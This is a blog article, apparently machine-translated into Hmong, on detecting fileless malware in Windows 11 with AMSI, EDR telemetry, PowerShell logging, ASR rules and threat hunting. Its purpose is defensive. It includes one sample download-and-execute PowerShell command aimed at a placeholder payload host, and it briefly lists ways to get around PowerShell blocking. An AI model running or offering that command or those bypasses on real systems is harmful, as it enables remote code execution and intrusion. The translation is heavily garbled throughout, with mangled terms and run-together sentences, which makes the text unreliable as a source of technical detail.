Tshawb nrhiav fileless malware hauv Windows 11: qhia thiab cov tswv yim

Fileless malware ua haujlwm hauv kev nco thiab ua phem rau cov txheej txheem raug cai xws li PowerShell thiab WMI.
Kev tshawb pom zoo yuav tsum tau saib xyuas tus cwj pwm thiab txheeb xyuas kev nco, tsis yog cov ntaub ntawv xwb.
AMSI, cov txheej txheem telemetry, cov cai txo qhov chaw, thiab kev yos hav zoov ua haujlwm yog cov yam ntxwv tseem ceeb hauv Windows 11.
Kev mob siab rau hauv WMI, Registry thiab MBR, nrog rau firmware thiab USB, nthuav dav qhov chaw nres.

Yuav ua li cas txhawm rau txheeb xyuas cov ntaub ntawv tsis txaus ntseeg malware

¿Yuav ua li cas txhawm rau txheeb xyuas qhov txaus ntshai fileless malware? Kev ua haujlwm ntawm Fileless nres tau loj hlob zuj zus, thiab ua rau muaj teeb meem loj dua, Windows 11 tsis muaj kev tiv thaivTxoj hauv kev no hla lub disk thiab tso siab rau lub cim xeeb thiab cov cuab yeej raug cai; yog vim li cas kos npe-raws li antivirus programs tawm tsam. Yog tias koj tab tom nrhiav txoj hauv kev txhim khu kev qha los kuaj pom nws, cov lus teb nyob hauv kev sib txuas telemetry, kev txheeb xyuas tus cwj pwm, thiab kev tswj hwm Windows.

Nyob rau hauv lub ecosystem tam sim no, kev tshaj tawm uas tsim txom PowerShell, WMI, los yog Mshta koom nrog ntau cov tswv yim zoo xws li kev txhaj tshuaj nco, ua rau "tsis txhob kov" lub disk, thiab txawm tias firmware kev tsim txomQhov tseem ceeb yog kom nkag siab txog daim ntawv qhia kev hem thawj, theem kev tawm tsam, thiab cov cim dab tsi lawv tawm txawm tias txhua yam tshwm sim hauv RAM.

Dab tsi yog fileless malware thiab vim li cas nws muaj kev txhawj xeeb hauv Windows 11?

Thaum peb tham txog "fileless" hem, peb tab tom xa mus rau cov kab mob phem uas Koj tsis tas yuav tso cov executables tshiab nyob rau hauv cov ntaub ntawv system ua hauj lwm. Nws feem ntau yog txhaj rau hauv cov txheej txheem khiav thiab ua tiav hauv RAM, tso siab rau cov neeg txhais lus thiab binaries kos npe los ntawm Microsoft (piv txwv li, PowerShell, WMI, rundll32, mshtaQhov no txo koj cov hneev taw thiab tso cai rau koj hla lub cav uas tsuas yog nrhiav cov ntaub ntawv tsis txaus ntseeg.

Txawm tias cov ntaub ntawv chaw ua haujlwm lossis PDFs uas siv qhov tsis zoo los ua cov lus txib raug suav tias yog ib feem ntawm qhov tshwm sim, vim qhib kev ua tiav hauv nco tsis tso cov binaries muaj txiaj ntsig rau kev txheeb xyuas. Kev tsim txom ntawm macros thiab DDE Hauv Chaw Ua Haujlwm, txij li cov cai khiav hauv cov txheej txheem raug cai xws li WinWord.

Attackers muab kev sib raug zoo engineering (phishing, spam links) nrog cov cuab yeej cuab tam: tus neeg siv qhov nyem pib cov saw hlau uas cov ntawv rub tawm thiab ua tiav qhov kawg them nyiaj hauv nco, zam kev tawm ntawm txoj kab ntawm disk. Lub hom phiaj yog los ntawm cov ntaub ntawv tub sab mus rau ransomware tua, mus rau ntsiag to lateral txav.

Fileless malware nrhiav kom tau

Typologies los ntawm hneev taw hauv qhov system: los ntawm 'ntshiab' mus rau hybrids

Txhawm rau kom tsis txhob muaj cov ntsiab lus tsis meej pem, nws yuav pab tau kom cais cov kev hem thawj los ntawm lawv qhov kev cuam tshuam nrog cov ntaub ntawv. Qhov no categorization qhia meej dab tsi persists, qhov chaws nyob qhov twg, thiab dab tsi kos npe rau nws tawm?.

Hom I: tsis muaj ntaub ntawv ua haujlwm

Ua tiav fileless malware sau tsis muaj dab tsi rau disk. Ib qho piv txwv classic yog siv a network vulnerability (zoo li EternalBlue vector rov qab rau hnub) los siv lub qhov rooj rov qab nyob hauv lub cim xeeb nco (xws li DoublePulsar). Ntawm no, txhua yam tshwm sim hauv RAM thiab tsis muaj cov khoom cuav hauv cov ntaub ntawv.

Lwm qhov kev xaiv yog kom kis tus kab mob firmware ntawm cov khoom siv: BIOS / UEFI, network adapters, USB peripherals (BadUSB-type techniques) lossis txawm CPU subsystems. Lawv txuas ntxiv los ntawm kev rov pib dua thiab rov nruab dua, nrog rau qhov nyuaj ntxiv uas Ob peb yam khoom kuaj xyuas firmwareCov no yog cov kev tawm tsam nyuaj, tsis tshua muaj, tab sis txaus ntshai vim lawv qhov stealth thiab durability.

Hom II: Indirect archiving dej num

Ntawm no, cov malware tsis "tawm" nws tus kheej ua tau, tab sis siv cov txheej txheem tswj hwm uas tseem ceeb khaws cia ua cov ntaub ntawv. Piv txwv li, backdoors uas cog powershell commands hauv WMI repository thiab ua rau nws ua tiav nrog cov ntxaij lim dej tshwm sim. Nws muaj peev xwm nruab nws los ntawm cov kab hais kom ua yam tsis muaj binaries poob, tab sis WMI repository nyob ntawm disk raws li cov ntaub ntawv raug cai, ua rau nws nyuaj rau kev ntxuav yam tsis muaj kev cuam tshuam rau lub cev.

Los ntawm cov tswv yim pom zoo lawv suav hais tias tsis muaj ntaub ntawv, vim tias lub thawv ntawd (WMI, Registry, thiab lwm yam) Nws tsis yog ib qho classic detectable executable Thiab nws txoj kev ntxuav tsis yog qhov tsis tseem ceeb. Qhov tshwm sim: stealthy persistence nrog me ntsis "ib txwm" kab.

Cov ntsiab lus tshwj xeeb - Nyem qhov no Antivirus yog dab tsi thiab nws ua haujlwm li cas?

Hom III: Yuav tsum muaj cov ntaub ntawv ua haujlwm

Qee qhov xwm txheej tuav a 'fileless' persistence Nyob rau theem kev xav, lawv xav tau cov ntaub ntawv raws li qhov tshwm sim. Cov piv txwv raug yog Kovter: nws sau npe cov lus qhia lub plhaub rau qhov txuas ntxiv; Thaum cov ntaub ntawv nrog qhov txuas ntxiv tau qhib, ib tsab ntawv me me uas siv mshta.exe tau pib, uas rov tsim kho txoj hlua tsis zoo los ntawm Registry.

Qhov ua kom yuam kev yog tias cov ntaub ntawv "bait" nrog random extensions tsis muaj ib qho kev txheeb xyuas tau, thiab feem ntau ntawm cov cai nyob hauv sau npe (lwm lub thawv). Tias yog vim li cas lawv tau categorized li fileless nyob rau hauv kev cuam tshuam, txawm hais tias nruj me ntsis hais lawv nyob ntawm ib los yog ntau tshaj disk artifacts raws li ib tug tshwm sim.

Vectors thiab 'tus tswv' ntawm tus kab mob: qhov twg nws nkag mus thiab qhov twg nws nkaum

Txhawm rau txhim kho kev kuaj pom, nws yog ib qho tseem ceeb rau daim ntawv qhia qhov chaw nkag thiab tus tswv tsev ntawm tus kab mob. Qhov kev xav no pab tsim tswj tshwj xeeb Ua ntej telemetry tsim nyog.

exploits

Raws li cov ntaub ntawv (Hom III): Cov ntaub ntawv, executables, legacy Flash / Java cov ntaub ntawv, lossis LNK cov ntaub ntawv tuaj yeem siv lub browser lossis lub cav uas ua rau lawv thauj shellcode rau hauv nco. Thawj vector yog cov ntaub ntawv, tab sis lub payload mus rau RAM.
Network-based (Hom I): Ib pob uas siv qhov tsis zoo (piv txwv li, hauv SMB) ua tiav kev ua tiav hauv userland lossis kernel. WannaCry tau nrov txoj hauv kev no. Direct nco load tsis muaj ntaub ntawv tshiab.

Kho vajtse

Devices (Hom I): Disk lossis network card firmware tuaj yeem hloov kho thiab qhia code. Tsis yooj yim rau kev tshuaj xyuas thiab txuas ntxiv mus sab nraum OS.
CPU thiab tswj subsystems (Hom I): Cov thev naus laus zis xws li Intel's ME / AMT tau pom txoj hauv kev rau Kev sib txuas lus thiab kev ua haujlwm sab nraud OSNws tawm tsam ntawm qib qis heev, muaj peev xwm stealth.
USB (Hom kuv): BadUSB tso cai rau koj rov ua dua USB tsav los ua tus keyboard lossis NIC thiab tso tawm cov lus txib lossis hloov tsheb.
BIOS / UEFI (Hom kuv): siab phem firmware reprogramming (xws li Mebromi) uas khiav ua ntej lub qhov rais khau raj.
Tus Kws saib xyuas ntshav siab (Hom I): Siv lub mini-hypervisor hauv qab OS kom zais nws lub xub ntiag. Tsis tshua muaj, tab sis twb tau pom nyob rau hauv daim ntawv ntawm hypervisor rootkits.

Kev tua thiab txhaj tshuaj

Raws li cov ntaub ntawv (Hom III): EXE / DLL / LNK lossis cov haujlwm tau teem tseg uas tso cov tshuaj txhaj rau hauv cov txheej txheem raug cai.
Ntsig (Hom III): VBA hauv Chaw Ua Haujlwm tuaj yeem txiav txim siab thiab ua haujlwm them nyiaj, suav nrog tag nrho ransomware, nrog rau tus neeg siv kev pom zoo los ntawm kev dag ntxias.
Scripts (Hom II): PowerShell, VBScript lossis JScript los ntawm cov ntaub ntawv, kab hais kom ua, cov kev pabcuam, Kev Sau Npe lossis WMITus neeg tawm tsam tuaj yeem ntaus ntawv hauv kev sib tham nyob deb yam tsis tau kov lub disk.
Cov ntaub ntawv khau raj (MBR / khau raj) (Hom II): Cov tsev neeg zoo li Petya sau qhov chaw khau raj kom tswj tau thaum pib. Nws yog sab nraum cov ntaub ntawv kaw lus, tab sis nkag mus rau OS thiab cov kev daws teeb meem niaj hnub uas tuaj yeem rov qab tau nws.

Yuav ua li cas fileless tawm tsam ua haujlwm: theem thiab cov teeb liab

Txawm hais tias lawv tsis tso cov ntaub ntawv ua tiav, cov phiaj xwm ua raws li cov lus qhia theem. To taub lawv tso cai rau kev saib xyuas. Cov xwm txheej thiab kev sib raug zoo ntawm cov txheej txheem uas tawm ib lub cim.

Pib nkagPhishing tawm tsam siv cov kev sib txuas lossis cov ntawv txuas, cov vev xaib cuam tshuam, lossis cov ntawv pov thawj raug nyiag. Ntau cov chains pib nrog Office cov ntaub ntawv uas ua rau cov lus txib PowerShell.
Zeej: backdoors ntawm WMI (filters thiab subscriptions), Registry execution keys los yog teem caij ua hauj lwm uas relaunch scripts tsis muaj cov ntaub ntawv phem tshiab.
ExfiltrationThaum cov ntaub ntawv raug sau, nws raug xa tawm ntawm lub network siv cov txheej txheem ntseeg siab (browsers, PowerShell, bitsadmin) los sib xyaw tsheb.

Cov qauv no tshwj xeeb tshaj yog insidious vim cov qhov taw qhia tawm tsam Lawv nkaum hauv qhov qub: cov lus sib cav sib ceg, cov txheej txheem chaining, anomalous outbound kev sib txuas, lossis nkag mus rau kev txhaj tshuaj APIs.

Cov txheej txheem ntau: los ntawm kev nco mus rau kev kaw

Cov neeg ua yeeb yam tso siab rau ntau yam cov hau kev uas optimize stealth. Nws yog qhov pab tau kom paub cov feem ntau tshaj plaws los qhib kev tshawb nrhiav tau zoo.

Nyob hauv nco: Kev thauj khoom payloads rau hauv qhov chaw ntawm cov txheej txheem ntseeg siab uas tos kom ua kom tiav. rootkits thiab hooks Hauv cov ntsiav, lawv nce qib ntawm kev zais.
Persistence nyob rau hauv RegistryTxuag encrypted blobs nyob rau hauv cov yuam sij thiab rehydrate lawv los ntawm ib tug raug cai launcher (mshta, rundll32, wscript). Lub ephemeral installer tuaj yeem ua rau tus kheej puas tsuaj kom txo qis nws hneev taw.
Daim ntawv pov thawj phishingSiv cov npe siv thiab cov password raug nyiag lawm, tus neeg tawm tsam tua cov chaw taws teeb thiab cov nroj tsuag ntsiag to nkag hauv Registry lossis WMI.
'Fileless' RansomwareEncryption thiab C2 kev sib txuas lus yog orchestrated los ntawm RAM, txo cov sijhawm rau kev tshawb pom kom txog thaum pom kev puas tsuaj.
Cov khoom siv ua haujlwm: automated chains uas kuaj pom qhov tsis zoo thiab siv lub cim xeeb nkaus xwb tom qab tus neeg siv nyem.
Cov ntaub ntawv nrog code: macro thiab cov txheej txheem zoo li DDE uas ua rau cov lus txib tsis txuag cov executables rau disk.

Cov ntsiab lus tshwj xeeb - Nyem qhov no Facebook txais Passkeys: yuav ua li cas nws hloov kev nyab xeeb thiab nkag mus rau koj tus account

Cov kev tshawb fawb kev lag luam tau pom qhov tseem ceeb tshaj plaws: hauv ib lub sijhawm ntawm 2018, a nce ntau dua 90% nyob rau hauv tsab ntawv-raws li thiab PowerShell chain attacks, ib tug kos npe rau hais tias tus vector yog nyiam rau nws cov hauj lwm zoo.

Kev sib tw rau cov tuam txhab thiab cov chaw muag khoom: vim li cas kev thaiv tsis txaus

Nws yuav ntxias kom lov tes taw PowerShell lossis txwv macros mus ib txhis, tab sis Koj yuav ua txhaum txoj haujlwmPowerShell yog tus ncej ntawm kev tswj hwm niaj hnub no thiab Chaw Ua Haujlwm yog qhov tseem ceeb hauv kev lag luam; blindly thaiv feem ntau tsis ua tau.

Tsis tas li ntawd, muaj txoj hauv kev los hla kev tswj hwm yooj yim: khiav PowerShell los ntawm DLLs thiab rundll32, ntim cov ntawv sau rau hauv EXEs, Nqa koj tus kheej daim qauv ntawm PowerShell los yog txawm nkaum scripts nyob rau hauv dluab thiab rho lawv mus rau hauv lub cim xeeb. Yog li ntawd, kev tiv thaiv tsis tuaj yeem ua raws li kev tsis lees paub cov cuab yeej muaj nyob.

Lwm qhov yuam kev yog delegating tag nrho cov kev txiav txim siab rau huab: yog tias tus neeg sawv cev yuav tsum tau tos cov lus teb los ntawm lub server, Koj poob kev tiv thaiv lub sijhawmCov ntaub ntawv Telemetry tuaj yeem muab tso rau kom txhawb cov ntaub ntawv, tab sis cov Kev txo qis yuav tsum tshwm sim ntawm qhov kawg.

Yuav ua li cas txheeb xyuas fileless malware hauv Windows 11: telemetry thiab tus cwj pwm

Lub tswv yim yeej yog saib xyuas cov txheej txheem thiab kev ncoTsis yog ntaub ntawv. Cov cwj pwm phem yog qhov ruaj khov dua li cov ntaub ntawv siv, ua rau lawv zoo tagnrho rau kev tiv thaiv cav.

AMSI (Antimalware Scan Interface)Nws cuam tshuam PowerShell, VBScript, lossis JScript scripts txawm tias lawv tau ua haujlwm zoo hauv lub cim xeeb. Zoo heev rau kev ntes obfuscated hlua ua ntej kev tua.
Kev soj ntsuam cov txheej txheem: start/finish, PID, niam txiv thiab menyuam, txoj kev, kab hais kom ua thiab hashes, ntxiv rau kev tua ntoo kom nkag siab tag nrho zaj dab neeg.
Kev tsom xam nco: Kev kuaj pom ntawm cov tshuaj, qhov cuam tshuam los yog PE loads yam tsis tau kov lub disk, thiab tshuaj xyuas cov cheeb tsam tsis zoo.
Starter sector tiv thaiv: tswj thiab kho dua ntawm MBR/EFI thaum muaj kev cuam tshuam.

Hauv Microsoft ecosystem, Tus Tiv Thaiv rau Qhov Kawg ua ke AMSI, kev saib xyuas tus cwj pwmLub cim xeeb scanning thiab huab-raws li tshuab kev kawm yog siv los ntsuas qhov ntsuas tawm tsam cov tshiab lossis obfuscated variants. Lwm tus neeg muag khoom siv txoj hauv kev zoo sib xws nrog cov neeg nyob hauv lub cav kernel.

Qhov tseeb piv txwv ntawm kev sib raug zoo: los ntawm cov ntaub ntawv mus rau PowerShell

Xav txog cov saw hlau uas Outlook rub tawm cov ntawv txuas, Lo Lus qhib cov ntaub ntawv, cov ntsiab lus nquag qhib, thiab PowerShell tau pib nrog qhov tsis txaus ntseeg. Kev siv telemetry zoo yuav qhia tau Kab hais kom ua (piv txwv li, ExecutionPolicy Bypass, zais qhov rais), txuas mus rau qhov chaw tsis ntseeg siab thiab tsim cov txheej txheem menyuam yaus uas teeb tsa nws tus kheej hauv AppData.

Tus neeg sawv cev nrog cov ntsiab lus hauv zos muaj peev xwm nres thiab thim rov qab kev ua phem yam tsis muaj kev cuam tshuam los ntawm phau ntawv, ntxiv rau kev ceeb toom rau SIEM lossis ntawm email / SMS. Qee cov khoom lag luam ntxiv cov hauv paus ua rau muaj txiaj ntsig txheej (StoryLine-type qauv), uas tsis yog rau cov txheej txheem pom (Outlook / Lo Lus), tab sis mus rau tag nrho siab phem xov thiab nws lub hauv paus chiv keeb los ua kom tiav qhov system.

Ib tug qauv hais kom ua raws li tej zaum yuav zoo li no: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic tsis yog qhov tseeb txoj hlua, tab sis cov teeb liab: txoj cai bypass, qhov rai zais, rub tawm kom pom, thiab ua tiav hauv nco.

AMSI, raj xa dej thiab lub luag haujlwm ntawm txhua tus neeg ua yeeb yam: los ntawm qhov kawg mus rau SOC

Dhau ntawm tsab ntawv ntes, ib lub tsev zoo nkauj orchestrates cov kauj ruam uas pab tshawb nrhiav thiab teb. Cov ntaub ntawv pov thawj ntau dua ua ntej ua tiav lub nra, qhov zoo dua., zoo tshaj plaws.

Script interceptionAMSI muab cov ntsiab lus (txawm tias nws yog tsim los ntawm ya) rau kev soj ntsuam zoo li qub thiab tsis muaj zog hauv cov kav dej malware.
Txheej xwm txheej xwmPIDs, binaries, hashes, txoj kev, thiab lwm yam ntaub ntawv raug sau. kev sib cav, tsim cov txheej txheem ntoo uas coj mus rau qhov kawg load.
Tshawb nrhiav thiab tshaj tawmCov kev kuaj pom tau tso tawm rau ntawm cov khoom console thiab xa mus rau lub network platforms (NDR) rau kev pom kev sib tw.
Cov neeg siv lavTxawm hais tias ib tsab ntawv raug txhaj rau hauv lub cim xeeb, lub moj khaum AMSI cuam tshuam nws nyob rau hauv sib xws versions ntawm Windows.
Administrator muaj peev xwm: txoj cai configuration kom pab tau tsab ntawv tshuaj xyuas, kev txwv kev coj cwj pwm thiab tsim cov ntawv ceeb toom los ntawm console.
SOC ua haujlwm: rho tawm cov khoom qub (VM UUID, OS version, hom ntawv, tus txheej txheem pib thiab nws niam txiv, hashes thiab cov kab hais kom ua) kom rov tsim cov keeb kwm thiab nqa txoj cai yav tom ntej.

Cov ntsiab lus tshwj xeeb - Nyem qhov no SpyHunter: Cov tshuaj tua kab mob tsis tseeb

Thaum lub platform tso cai rau exporting nco tsis tau Nrog rau kev ua tiav, cov kws tshawb fawb tuaj yeem tsim cov kev tshawb pom tshiab thiab txhawb kev tiv thaiv zoo sib xws.

Cov tswv yim ntsuas hauv Windows 11: kev tiv thaiv thiab tua tsiaj

Nruab Windows 11 kom raug hauv 2025

Ntxiv nrog rau muaj EDR nrog kev tshuaj xyuas nco thiab AMSI, Windows 11 tso cai rau koj kaw qhov chaw nres thiab txhim kho kev pom nrog haiv neeg tswj.

Kev tso npe thiab kev txwv hauv PowerShellEnables Script Block Logging thiab Module Logging, siv cov kev txwv txwv qhov twg ua tau, thiab tswj kev siv Bypass / zais.
Kev Tawm Tsam Tawm Tsam Txo (ASR) Cov Cai: blocks script launches los ntawm Office txheej txheem thiab Kev tsim txom WMI/PSExec thaum tsis xav tau.
Chaw ua haujlwm macro cov cai: disables los ntawm lub neej ntawd, sab hauv macro kos npe thiab nruj kev ntseeg siab; soj ntsuam cov keeb kwm DDE ntws.
WMI Audit thiab Registry: saib xyuas cov xwm txheej subscriptions thiab cov yuam sij tsis siv neeg ua haujlwm (Khiav, RunOnce, Winlogon), nrog rau kev tsim ua haujlwm teem sijhawm.
Kev tiv thaiv pib: Ua kom muaj kev ruaj ntseg khau raj, tshawb xyuas MBR / EFI kev ncaj ncees thiab lees paub tias tsis muaj kev hloov kho thaum pib.
Patching thiab hardening: kaw cov kev ua tsis zoo hauv browsers, Chaw Ua Haujlwm Cheebtsam, thiab cov kev pabcuam hauv network.
kev paub: cob qhia cov neeg siv thiab pab pawg technical hauv phishing thiab cov cim ntawm covert executions.

Rau kev yos hav zoov, tsom rau cov lus nug txog: tsim cov txheej txheem los ntawm Chaw Ua Haujlwm ntawm PowerShell / MSHTA, sib cav nrog downloadstring/downloadfileCov ntawv sau nrog kev pom tseeb, kev txhaj tshuaj tiv thaiv, thiab kev sib txuas sab nraud rau TLDs tsis txaus ntseeg. Hla-reference cov teeb liab nrog lub koob npe nrov thiab zaus kom txo suab nrov.

Txhua lub cav tuaj yeem ntes tau dab tsi niaj hnub no?

Microsoft cov kev daws teeb meem kev lag luam ua ke AMSI, kev coj tus cwj pwm analytics, tshuaj xyuas lub cim xeeb thiab khau raj sector tiv thaiv, ntxiv rau huab-raws li ML qauv los ntsuas tawm tsam cov kev hem thawj tshwm sim. Lwm tus neeg muag khoom siv cov tshuaj ntsuam xyuas qib kom sib txawv ntawm qhov tsis zoo los ntawm cov software zoo nrog tsis siv neeg rov qab hloov pauv.

Ib txoj hauv kev los ntawm kev ua dab neeg Nws tso cai rau koj txheeb xyuas cov hauv paus hauv paus (piv txwv li, ib qho Outlook txuas uas ua rau cov saw hlau) thiab txo cov ntoo tag nrho: cov ntawv sau, cov yuam sij, cov dej num, thiab cov binaries nruab nrab, tsis txhob poob ntawm cov tsos mob pom.

Feem ntau ua yuam kev thiab yuav ua li cas zam lawv

Yuav ua li cas ntxuav lub Windows sau npe yam tsis muaj dab tsi tawg

Thaiv PowerShell yam tsis muaj lwm txoj kev tswj hwm tsis yog tsuas yog siv tsis tau, tab sis kuj muaj txoj kev hu nws indirectlyTib yam siv rau macro: txawm tias koj tswj hwm lawv nrog cov cai thiab kos npe, lossis kev lag luam yuav raug kev txom nyem. Nws yog qhov zoo dua los tsom rau telemetry thiab kev coj tus cwj pwm.

Lwm qhov yuam kev yog kev ntseeg tias daim ntawv teev npe dawb daws txhua yam: fileless thev naus laus zis tso siab rau qhov no. ntseeg appsKev tswj hwm yuav tsum saib xyuas lawv ua li cas thiab lawv cuam tshuam li cas, tsis yog seb lawv puas raug tso cai.

Nrog rau tag nrho cov saum toj no, fileless malware tsis ua "dab" thaum koj saib xyuas qhov tseem ceeb: cwj pwm, nco, thiab keeb kwm ntawm txhua qhov kev ua. Ua ke AMSI, cov txheej txheem nplua nuj telemetry, haiv neeg Windows 11 tswj, thiab EDR txheej nrog kev ntsuas tus cwj pwm muab qhov zoo rau koj. Ntxiv rau qhov sib npaug cov cai muaj tseeb rau macros thiab PowerShell, WMI / Registry auditing, thiab yos hav zoov uas saib xyuas cov kab hais kom ua thiab cov txheej txheem ntoo, thiab koj muaj kev tiv thaiv uas txiav cov saw hlau ua ntej lawv ua suab.

Tshooj lej:

computer networks

Christian Garcia

Mob siab rau technology txij thaum nws tseem me. Kuv nyiam nyob rau hnub tim hauv lub sector thiab, qhov tseem ceeb tshaj, kev sib txuas lus. Tias yog vim li cas kuv tau mob siab rau kev sib txuas lus ntawm thev naus laus zis thiab video game websites tau ntau xyoo. Koj tuaj yeem pom kuv sau txog Android, Windows, MacOS, iOS, Nintendo lossis lwm yam ntsiab lus uas los rau hauv siab.